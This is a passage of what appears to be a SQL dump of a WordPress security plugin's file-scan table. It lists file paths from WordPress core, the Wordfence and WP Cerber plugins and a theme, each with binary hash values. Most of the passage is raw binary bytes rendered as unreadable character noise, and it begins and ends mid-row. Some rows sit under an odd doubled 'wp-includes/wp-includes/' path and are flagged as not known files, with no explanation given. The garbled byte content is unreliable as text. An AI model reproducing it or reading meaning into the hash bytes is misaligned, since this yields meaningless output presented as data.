��_�3�O�','',0,'?'),('&#�p�J��h��','wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g���{�����&ij��','ڙ��ڢ��D��W����\rэ��3�U��','',0,'?'),(',!#Q��P�[;����','wp-includes/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R�P��y�BB&F4','�k������i�]J��	��ƙ۰Tl��x�','',0,'?'),('4��ہ��;�0�.*','wp-content/plugins/wordfence/views/blocking/country-modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�12�;�j�4�F|','ȾLg7���ԠB�$Ru�H�������io��','',0,'?'),(':뭲c��RPe(','wp-includes/rest-api/class-wp-rest-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0}��7V5�I�385','SB5}�uٵŶ/�����S�5%�8�z�V�','',0,'?'),('T?�,%,�zG%���','wp-content/plugins/wp-cerber/assets/select2/LICENSE.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ABQ,�:	��\r�j','����Z5L�ѾR��9���	`C���)�M','',0,'?'),('e؟�v���笪�Ej','wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.��9�j�����\Z','��D���8>�̓��hv�!׭�5�y�1��','',0,'?'),('k\0\Z���{ ݛ6�','wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n��|�bA~tb`*','�����}͒l>��-A�����T�$��]n','',0,'?'),('k����b��gS�','wp-includes/js/tinymce/plugins/wplink/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6�l�UOaD�Q�','����jT�q�T��I:KZ��a\n�6�U7e��-','',0,'?'),('ye&ߔO)x��p�','wp-includes/wp-includes/sodium_compat/src/Core32/Salsa20.php',0,')6��):�������',')6��):�������','H0��L�ї?�㞹�.1�M�Ie��٣�','',0,'?'),('�j����&(�,}u','wp-includes/wp-includes/js/dist/blob.js',0,'$ج�o8؁)�c����','$ج�o8؁)�c����','��\Z\Z���#9�#�H�;yό�:˙���#e','',0,'?'),('���L��.�\n�w;[','wp-content/plugins/wordfence/lib/dashboard/widget_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��@�Q�zGz�H','\"e�5�����-��fh�b?#r��=�a�v͠�','',0,'?'),('����g�~�w\Z�hh','wp-admin/css/themes-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V�@~vȃ���A','JvQܢZ�f��ґ3���(8tЇa�KC�@�e�','',0,'?'),('�/�V�	X�[�\n�','wp-content/plugins/wp-cerber/assets/flags/cv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����#!�C�@���','�#���wQ�u����g���u��w[��ȥ~','',0,'?'),('�-F�0|��5k���^','wp-includes/wp-includes/block-supports/custom-classname.php',0,'�ؚ�WiY�C��v�G','�ؚ�WiY�C��v�G','� #rCҗ�)�[�ȫ�R̞[���Q�\\�&��','',0,'?'),('�ͥ`FJ��S�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kz+U��Ÿ(�5\\','8:��o�I�9,��=zDk8;�{A{�\Zij','',0,'?'),('��bm�%����ڭ֫','wp-includes/Requests/Exception/HTTP/502.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�:l��z��!{�G�i','�/���~UJO�.ŀ#��E��5�*�\'C�q','',0,'?'),('	QW���~-�\0d�','wp-includes/class-phpass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_͂�t��WQ1�aL�','@FY�v�G^\n����}/$O���~;a\0M','',0,'?'),('	?������q�uM','wp-includes/js/mediaelement/mediaelementplayer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��5�)��k�y�~','_Dt�3ג�3p��a�;9,�\n�ig���C?3�','',0,'?'),('	,��/Օ�!�gy�d','wp-includes/js/media-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sq��a:�_::ΗF�.','\0X�n�,�T�P� �QKh&���xFH���u;7','',0,'?'),('	7�������f	`','wp-content/plugins/wordfence/images/sort_both.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�m	�8�f�|�Y��','~�%��ۉ�%���>����Bl�o�u�I)ȉ7g','',0,'?'),('	J�����;uz','wp-includes/sitemaps/class-wp-sitemaps-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dwi�+���M�U','`ߨ=I\\�L����0Z��Y��a�g���5','',0,'?'),('	P=N>��b\"j:~[Q{�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�We⎆?��N��t','n4��<��Fz������_�5��kig�','',0,'?'),('	X�t\\4vNI5��j��','wp-admin/async-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]t\r;��B�� ��]�','����\r �?���\"��hz�3��L�W�q�5�\"','',0,'?'),('	�h�Xk%�>���{N�B','wp-includes/js/dist/viewport.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_����&��x��','�G�X<����$��~\0��g>�\0W	���\"!','',0,'?'),('	��8�a�^�N�a�!','wp-includes/wp-includes/js/codemirror/htmlhint-kses.js',0,'��[��k[�#cLf{','��[��k[�#cLf{','�N��&�V\Z�A��/��R#~բ���_J*�Ї','',0,'?'),('	�.��5ua�WkJ��','wp-includes/Requests/Exception/HTTP/413.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�]ɐY��XL��','\r��}�䟹-V�����\'eCCʅ�e-2,0','',0,'?'),('	ɑ#Xlb���f����','wp-includes/wp-includes/random_compat/random_bytes_mcrypt.php',0,'��T�Ԧʙ`�P��L','��T�Ԧʙ`�P��L','�b=�-.���X�����T���Yn���P��','',0,'?'),('	Ӱꅑ��������c','wp-includes/js/dist/escape-html.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{\n>LZ�߇�&���','?��7�p\Z�r�rw��ns\nq���l�+}��#�','',0,'?'),('	�9��fވU�f���','wp-includes/js/tinymce/tinymce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xl����̡C��kn','�Zk�	�6|��{�*\Z��{�H����iܝk^','',0,'?'),('	�)a��x��u���','wp-content/plugins/wp-cerber/assets/flags/sm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�4��f�����u�n','���v-��d1�Y2�0�-�����*�����','',0,'?'),('	��Ih�B�pO','wp-includes/blocks/heading/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�J��+��4G��Ѹ','+\\�X��IJ��J����\'�|��KiV��TD����u','',0,'?'),('	����09��-b��ͩW','wp-admin/network/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��p ���TcP\"','4����Z�@�\'x�ȬV��gR��l�\r�%','',0,'?'),('	�/�?��^��E�Ց','wp-includes/sitemaps/class-wp-sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5.R�\0I�u�\'tV�','g���e��;�_~�_f/Pv��hm�H��g�','',0,'?'),('	�by\'���w��X��','wp-content/themes/sg-window/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rUJj��ߔ�m���*��','.agO=�E�#�) 0�y�y��\r��F��ԑ�','',0,'?'),('\n%2F�0��h\"�Ha��','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kX�Zb����5��','[\0N����E�g����gd�q\r����*\'I�','',0,'?'),('\nB��&�4u���B?�','wp-includes/wp-includes/sodium_compat/lib/php72compat.php',0,'AG�\Zˢ;�������l','AG�\Zˢ;�������l','�D^�Y���\n�����%P+�0��[�x�~��','',0,'?'),('\nT��/\\9$Y�U\n��͌','wp-includes/customize/class-wp-widget-form-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�D*@6�{τ}��','�+֓zi���@����^F%5�qZg<��','',0,'?'),('\nf���Y��4&�L�','wp-admin/images/se.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȔB�`��.}\'7:','Y������\"K��{�U���r�:2��JL���','',0,'?'),('\nz�ŭ�}�{�.�u[�','wp-includes/block-supports/generated-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f	o��I1Z�N}v�-','̈́q}�0N�PvQ�&k����T�@/`v�','',0,'?'),('\n{X%N8Ÿw�2?M4C�','wp-includes/css/dist/format-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z۹��Pf!�\'D��','V���h��?����a�M��ݗ4�{�\0','',0,'?'),('\n���f�Ӆ;{�t��','wp-includes/class-wp-role.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yH���,o�:���','\'}ؑ9��X8u���ߨ�[(o�a�n\\�','',0,'?'),('\n���b-�V�:��|m��','wp-admin/edit-link-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��Zeq�i�[��\rv','[��ϣb]�9�\\�|��ֲ*V\r�~��z�^','',0,'?'),('\n��NNM��ۑ4;�p�4','wp-includes/js/customize-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�o�ϱ;��Rwc','.a���x��^�g[&�E�ΡJJ�T�SՀ�','',0,'?'),('\n�\r��:�n#�pJ�yX','wp-includes/wp-includes/css/dist/format-library/style.css',0,'�\Z۹��Pf!�\'D��','�\Z۹��Pf!�\'D��','V���h��?����a�M��ݗ4�{�\0','',0,'?'),('\n�@�g��+T;V��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f���\r@)��뻚','�;����_I��m�1�����\n�9|!޶��','',0,'?'),('\n�\r�B��p̭','wp-admin/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';&�0G�����Q��ʚ','�gJRb��\0tf�2Å�&��0u�jYH�i��','',0,'?'),('\n��:�X2�L��nc','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c�z��p���(�,','��,����%u\Z��Rz�B�\r#��~�+`�5y�','',0,'?'),('\n�Gƙn��\Z@1+U]�','wp-admin/css/revisions.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ϳ�FY�� p*','~!Z���7��/���<��3�Y�,�=Zk(','',0,'?'),('���юGMm�d�','wp-includes/wp-includes/blocks/tag-cloud/block.json',0,'��M0����*��','��M0����*��','���-ZE�\n�*��6�]\\� ]m�{N��','',0,'?'),('�c{���� �C��[','wp-includes/wp-includes/js/mediaelement/wp-playlist.min.js',0,'����3|G^�cKT\"�','����3|G^�cKT\"�','\'�e\"ʌ�_(n��f��ww�\Z�N�2�+ ','',0,'?'),('\"w%�_��K\\��u�','wp-admin/images/wpspin_light.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('&c�YD�#�P{+��','wp-includes/js/jquery/ui/effect-blind.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȷ��� ��m�7','Q�X�_m�\\>��h�!Ƶ�^M���!V^&','',0,'?'),('A`�k{�n���/*ScN','wp-includes/js/dist/vendor/react-dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�JeN���uL��','��\"mO�=����E¹jas�lIJ�������','',0,'?'),('Y]�<N�m��%�','wp-includes/wp-includes/js/dist/viewport.min.js',0,'����>��`،�@�8�','����>��`،�@�8�','p�J^_��Wm�kN_���b�vc\n�����!cU�','',0,'?'),('~�Fӡ�q���TMB�','wp-content/plugins/wp-cerber/assets/flags/ls.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�?\0��rɝ��E?�','�t?B��\0��{��!����e��Wh�ٲv��','',0,'?'),('�����Y����q�','wp-includes/customize/class-wp-customize-partial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J@�N-p<�1]\Z�n�','ƪ�㫾������s�uu��nΐ\0��V<1�r','',0,'?'),('���,H(b�_F�O','wp-admin/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�י_xL9�~h��\0','�H*+w�����Cy�	m�v�1R�2\ng�\\�','',0,'?'),('�2���M-q	,\"�\'@','wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('��HVե�d��p�Vp','wp-includes/images/media/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4���\0T��̇?�','����v��)�\n�6Zl��2���В1�!+	�','',0,'?'),('�}��$�s_p!\'��','wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.js',0,'�K�.�Aj_�m�r#i�','�K�.�Aj_�m�r#i�','\'��C��b\"B��\\�N�N���*r&.X��J','',0,'?'),('��!���\\Qq��|~�','wp-content/themes/sg-window/inc/js/image-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����5�~&�V�\Z[0�','$�8�Iv��Q�L��N�H\nL@:?kL�7�Y�_','',0,'?'),('˾`�BM�`�~!�ǰ�','wp-includes/wp-includes/ID3/module.audio.dts.php',0,'�llA�2���̋�','�llA�2���̋�','\Z�aH���r���%A���6$`Hu�T�6y�4�','',0,'?'),('�\n��UN~���\0m��','wp-includes/js/codemirror/csslint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M_ϱI����l�',']�ih4F��ò�\r��U����WEK(�P�d','',0,'?'),('�{`+�������\0|','wp-includes/wp-includes/js/jquery/jquery.query.js',0,';�Xz�ǰ��wC',';�Xz�ǰ��wC','�u�g^���+��i��m���G\rF�x�i�X�','',0,'?'),('�c\"ml� �Ǟ>o','wp-admin/images/wordpress-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�%�d���g���p','�\"�u�j-QE\0��[�gL�Z5�MD�:','',0,'?'),('$%#��_�U�_d�','wp-content/plugins/wordfence/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G�a2��%x�h�YB','p�����~���&�������W�OX(Û ','',0,'?'),('*�O�������i','wp-includes/customize/class-wp-customize-media-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�lh�¸�j�68��','V]�l��1W�+	{6v��ޣ��C���=��','',0,'?'),('=�NgÈ�����W;','wp-content/plugins/wp-cerber/assets/flags/ci.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�yd���2¹��','���.�=D	��dԢ���)�*k���,8Dˬ','',0,'?'),('CX��2��k��Cҳ�','wp-includes/wp-includes/js/wp-ajax-response.min.js',0,'/pM]�{\"@���s�:l�','/pM]�{\"@���s�:l�','�B�HQW�2����a��w��C���- Y��','',0,'?'),('D�� �2��K|&�','wp-admin/css/nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g^�C>��uJ�>�\Z','�V.��/�SV��9:_I:aldt�p���aue','',0,'?'),('Q�10�����G��,','wp-includes/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x} ��pc��K�O�','(H>�0�}���8:e�)T��N�/�z�','',0,'?'),('{�M��i�i2n��6�','wp-includes/js/jquery/ui/effect-highlight.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N���x���:��cT�','D�I�4h\ng�SZ����o|�(ޱs\r8�z��','',0,'?'),('�K\Z �}�ȑ�ׄː�','wp-content/plugins/wp-cerber/assets/flags/lb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',6uƤs%��D^P��)�','��!�sl��Q��_~m�I�n��G)���.','',0,'?'),('���(��f�N@囬','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php',0,'1\r�\Z�Y�ܵm`���','1\r�\Z�Y�ܵm`���','~G��s��Mp�����^I�\0~\n)g�<��%��','',0,'?'),('��\0�뀀q��v�','wp-includes/wp-includes/Requests/Exception/HTTP/306.php',0,'Wsz�uNP�j���Xu','Wsz�uNP�j���Xu','4�U���Q\r1#_f������H���*I�dl��','',0,'?'),('�jZ�����V�a','wp-includes/wp-includes/js/dist/media-utils.min.js',0,'������ϱ݂I','������ϱ݂I','����Ȗ�riP]�o���+�g֯�*?=P','',0,'?'),('��A��Fk�','wp-admin/js/privacy-tools.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_j]������RW','DŽܜ�6�\\���@���]ؿ��(��9�N	c','',0,'?'),('���.Q}3��T�','wp-includes/Requests/Hooker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@%�a[ў/4��','t\r{�k�?i�k�C\nL��b�̇�Wy','',0,'?'),('�Z�u���iigԄ��','wp-includes/js/dist/nux.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<���p.��\'���WN','D�����%ss��&�	v]3�T�sq*#��#k�','',0,'?'),('\r\"��<�fKl:�fdH�','wp-includes/wp-includes/class-wp.php',0,'Z�I�֩�Eu&S^:�9','Z�I�֩�Eu&S^:�9','���t�D�MQ��ҊW8�����&���8','',0,'?'),('\rE�lZ}�I��8�+V','wp-content/plugins/wp-cerber/assets/rateit2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B�_��[r]s�T�j','�Uu8�X*O\'bS,���+�|tV֭�( S�','',0,'?'),('\rU�j�zh�2/�9�fM','wp-admin/js/application-passwords.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iߞ=�%\\�����p�L4','\'й�1��]��uYїv�l�0���H�\\����','',0,'?'),('\rZ��������gG','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',0,'� �w^��]緣M','� �w^��]緣M','����ZE�O�7(�nY��h�˨��','',0,'?'),('\r\\���q	ݱҕ�|�@','wp-includes/wp-includes/SimplePie/Caption.php',0,'܊��y�u�D\r£�','܊��y�u�D\r£�','\'�W1Q�5[ۋ�)��\r�8۝5:��?*)K','',0,'?'),('\rxݍ�^���\Z���<;','wp-admin/my-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/v�	h7�@A�h','P[ĝ�C1��֡?qt�����C�����w#','',0,'?'),('\rz�����D�D��','wp-content/plugins/wordfence/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SDRU���7}�','�n:kɆZ���/��|L���S����n�D.N','',0,'?'),('\r����X����+�-Ta','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ �Mϼ�V_�i�	��','��U�s����D�MÙ�d��(�\0��ā�~���','',0,'?'),('\r�vN��[B��&��SL','wp-admin/css/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M嬬�S�Ի�JP��','��H����焑;���#�O����/t��','',0,'?'),('\r��<�:� -{��̖H','wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3°�\nᄷ�\0�a��','`	\\XO�U>8X.�f��?��m�{\nQ]�8��','',0,'?'),('\r�ҧxOz��z���h','wp-includes/class-wp-customize-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�Vj�\'WB{.��u','�f)%�|u��8Jo�A�tD4�L�+����^','',0,'?'),('\r��:�:���HH�:d','wp-admin/css/edit.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�=Z��-�!?q#3�','�J墥��O������b�*�:e�š�P�','',0,'?'),('\r�0�n$8W���4�_z','wp-includes/wp-includes/js/dist/url.min.js',0,'bͻ�:�[P�XpXα','bͻ�:�[P�XpXα','pʼn�\0oŖ���c�^f��$l�Б�zƝ','',0,'?'),('\r�%����%�yS�`�','wp-includes/js/crop/cropper.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����H.s�o����','�py����,B�����G��-�t�����=�s','',0,'?'),('\r�pTt�\Z���n��!S�','wp-includes/wp-includes/wlwmanifest.xml',0,'�Ԑ����i�^��','�Ԑ����i�^��','�ƤJľ**X|i���cy-�u6p�C-�$*\n�','',0,'?'),('\rѪ1s1=��`(�y','wp-admin/options-head.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cV8A#h:e׭/��^','c҈��^$kR2\r=���ܫ���@g��2�','',0,'?'),('\rҗ�r׾� ���\n�\Z','wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�@���ޯ]��&','7aP��\\T����\"S�z���J�&b�ٸ®D�','',0,'?'),('T��Ï!�H�M�3�','wp-includes/wp-includes/bookmark-template.php',0,'�dZc7��4�JX��','�dZc7��4�JX��','�t��l�P?d���=)��@zi�!��9a�','',0,'?'),('W7��{(��;:P���?','wp-admin/includes/class-bulk-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A2�?������+Y��','�i���;�M3�U�P�<�XZ��z����','',0,'?'),('X��H奥(�:�Z�','wp-admin/admin-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�Iys��j�y��Ѩ_','8=Ի�(���H��&�uE\Zl}RZ��>Ol�x','',0,'?'),('Z��w윩<�)mns','wp-includes/wp-includes/theme-compat/footer.php',0,'f�8��y̻�@�B�5','f�8��y̻�@�B�5','][����ۭ�}�ߟv{�c�vҧ{P��K1~��','',0,'?'),('\\d���;�ѳbI%@��','wp-content/plugins/wp-cerber/assets/flags/dk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K\n�l����7D!','%���w����r6�U^�/1���6�a��\'<b�B','',0,'?'),('^��� �lkB��K�','wp-content/plugins/wp-cerber/assets/flags/vg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����C�XBJ��\'2','`���G�a\02��%̛7�\\H�=gs�%��','',0,'?'),('a5�ͅB�_��s�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('go�s�V�;���\n$','wp-includes/js/tinymce/plugins/compat3x/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�n���1����oVb','C���T�(��N+�,��TN�C����`ީ���','',0,'?'),('�h�r\Z����;%e�-x','wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('��J%�_�%��','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png',0,'�lzV6`wmZBs���','�lzV6`wmZBs���','\r �8�&�J�34�б��ǽ�����','',0,'?'),('� ��C�Y���','wp-includes/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�w3aAr���6VH%�2','%���(\'��Q�[����y�B��	�O4AO7','',0,'?'),('�>�M�8� ٵ��|','wp-includes/images/crystal/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S����I0An�','L��%X����O�+��Aa�!�S�\\܉�&���','',0,'?'),('�Hd�����o�CZ','wp-includes/sitemaps/class-wp-sitemaps-index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&a���1��5b}1','�kZ���`��*5Yu�…�WB�-4Y?�{̯�','',0,'?'),('�ڝR���Q���7x�','wp-includes/wp-includes/shortcodes.php',0,'��\'9A�C��zaϥ�2','��\'9A�C��zaϥ�2','@o��i\r��������}�8�n���#�\Zق','',0,'?'),('��?�B����;�\n�4','wp-content/themes/sg-window/css/scheme-1.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{v�.��-�&̴l','E���G�J���:�;���i��bN�_��S�F','',0,'?'),('��\"\rJ\04��\'i�','wp-admin/js/password-strength-meter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʃ�D����)�a�n','`��)C�E�L�d�X\\�&F-�V7�+1�SA','',0,'?'),('&@lL�G�#ck��_{','wp-content/themes/sg-window/js/parallax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5��%����9ze','�E\"���Z�~6;`���+Q�z�/D��HJ`8�{','',0,'?'),('\'�E���~�(�l��','wp-includes/wp-includes/images/wlw/wp-watermark.png',0,';��uMmܭD|�w���D',';��uMmܭD|�w���D','�S��nR�\'��X�^���kh����ɑ�i�7�','',0,'?'),(',o��Iw�u皍^Ķ','wp-includes/wp-includes/css/dist/block-library/theme-rtl.min.css',0,'����a�,U���ʑ�','����a�,U���ʑ�','��܉�)�\0I]�7h�S��l�(�B\n}kw�a','',0,'?'),('4�}T�k�D\'W','wp-content/plugins/wp-cerber/assets/rateit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)3U�d�/��{\ZK3E�','�,-3�\"�a��~����P�c���8�F��M','',0,'?'),('Vn�`�G�}>a\\','wp-includes/block-patterns/text-two-columns-with-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���N o�F\0�A\n','cUȫd4�B�nD����Q��n+R��J1e','',0,'?'),('\\�����AV*籿','wp-includes/js/jquery/ui/slider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��ҏ��9�4g��','/\0�ȷ�s�d�Z�Ʈ�6����[�-\ZM ?u','',0,'?'),('qF�F=�1h�v�:�','wp-includes/wp-includes/js/jquery/ui/effect-explode.js',0,'��0���i!1��	�','��0���i!1��	�','s��e=\'���ڜ�N�I�{�U�!�M�E�s','',0,'?'),('wW�<��4|3%','wp-includes/wp-includes/js/jquery/jquery.serialize-object.js',0,'*�D�B\ru�6����!','*�D�B\ru�6����!','��`�RԶ�2ɀ�`��Mx��i�G�fz�C2�','',0,'?'),('��殇�w��m�W�o','wp-includes/wp-includes/class-wp-embed.php',0,'�1�����\\�OR���Z','�1�����\\�OR���Z','�`7t/���}�z����f!��l=�,�8tS0F�]','',0,'?'),('�c��nx�Ժ|�','wp-includes/class-walker-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��2�G�E����;H�','GJ8������Y<1Q{<�5�C���[�V��z','',0,'?'),('��e��0��p�r���','wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.min.js',0,'�&���\rb���!���','�&���\rb���!���',',�`i�t���ڎ�Tm��l��k�s�\r=','',0,'?'),('�����n��Nd','wp-includes/js/hoverintent-js.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' p��.`�u76��?','Y!�:\nA��ː	��ګ�Zg�,=�|����','',0,'?'),('�]�*�.>`E��f�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�F���h�瀁1-�','6!o�m��ݎ^�.�^@˨��v7�	I�}��','',0,'?'),('�ݡ=��Nx��K�`*','wp-content/plugins/wordfence/lib/wordfenceClass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��R������\\��','j��� �����=��$W�^�P�i�Z��\"','',0,'?'),('��d��=��@hs�:k}','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#lJP��e0u�g�۔�','U�WM����slL����9#Tb�Wj?\\�u���','',0,'?'),('�rJ�<p>����Z�','wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7����*J\0���\0�','�7�C�:r�xe��BM�����sx8�d;�+','',0,'?'),('�\0��Y�y2>IM�3','wp-includes/wp-includes/js/wp-list-revisions.js',0,'PbOP�xO�rs7��2','PbOP�xO�rs7��2','�#��;w�1���.��B���3�f_;�Pf�','',0,'?'),('�X����{hMr�ϒ��','wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.min.js',0,'m��3���ܖ3��M','m��3���ܖ3��M','z�N\'A�%�S��@